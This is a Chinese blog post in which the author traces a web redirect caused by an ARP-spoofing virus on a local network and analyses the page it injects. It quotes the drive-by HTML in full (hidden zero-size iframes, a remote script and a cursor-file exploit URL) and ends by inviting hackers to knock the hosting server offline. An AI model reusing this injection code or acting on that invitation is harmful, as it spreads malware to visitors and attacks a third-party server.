起初我还一位登上了一个带病毒的网站呢,清除就清除吧。可后来发现不是那么回事。只要一打开网站,必然会弹出发现病毒的提示。
去百度上搜了一下,才基本上知道原因。而这个原因起初我也怀疑过。局域网内有人种了这种病毒,病毒使用ARP截获并转发,将局域网内所有要打开页面的网址先转发到一个病毒作者指定的网站上,再跳转到真正所要进入的网站。跳转只是一瞬间。
去微软找了一下这个漏洞的补丁,我的机子是win2003 SP2
这个漏洞的补丁当时我就已经打过,并且我的机子已经SP2了,按理说这种事情不应该再发生了。不知道为何,遇到利用这个漏洞的病毒,竟然无法防御。我下载后又打了一遍,情况依然……
接下来的事情就比较奇妙了。在所转到的那个站点的页面内,很容易的就找到了跳转到的地址。http://1111.850860.cn/pic.htm 顺着目录找下去,打开源码来看。
<iframe src=http://1111.850860.cn/pic.htm width=0 height=0></iframe><HTML><BODY style='CURSOR: url(http://www.6658588.cn/ad.jpg)'></BODY></HTML><script src=http://www.6658588.cn/0614.js></script><iframe src="http://www.6658588.cn/1/123.htm" width="0" height="0" border="0"></iframe><script language="javascript" src=http://ww3.tongji123.com/t1.aspx?id=38251079></script>会做网页的人应该都能读懂上面所写的意思。
首先这个页面嵌套了一个地址为http://1111.850860.cn/pic.htm的宽高都为0的伪隐藏框架,这个页面里的病毒数量可想而知,只要作者喜欢,可以放成千上万个。然后在BODY主题部分加入了一段CSS样式,内容的意思为:让光标按照url(http://www.6658588.cn/ad.jpg)所链接的样子来显示。而这个JPG图片呢,也正是一个病毒,这段代码也正是利用微软公布的这个漏洞。然后下面又是一个隐藏框架,链接到的地址为http://www.6658588.cn/1/123.htm这个页面,里面也可以放入大量的病毒。更可笑的是,在最后一段代码上,作者还加了一个统计123网的统计链接,用来统计有多少人访问过这个页面。ID为38251079 链接地址是:http://ww3.tongji123.com/t1.aspx?id=38251079。
PING了一下上面的两个地址后,得到的IP是同一个服务器IP:60.190.114.84 所在的地址是:浙江省温州市电信
查了一下WHOIS,得到这两个域名都是被同一家公司:北京万网志成科技有限公司 注册的,域名是由中国万网提供的。
公司邮箱为:6658588@163.com
域名注册于2007年6月8日
我的调查只能到此结束了,又是一个典型的中国人害中国人的骇客事件。我想,与我有同样经历的朋友们,也感受到了这恶心的病毒和漏洞带来的麻烦。我只是希望,中国的骇客不要再害自己人了。。。也希望看到我这篇文章的黑客朋友,可以帮忙干掉这台害人的服务器。真正的解决办法,可能也就是再装一个ARP的防火墙,或者打一个微软的漏洞。
希望没有装防火墙的朋友们,还是买一款中国的好防火墙来抵御一下来自国内外骇客的无耻攻击吧。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构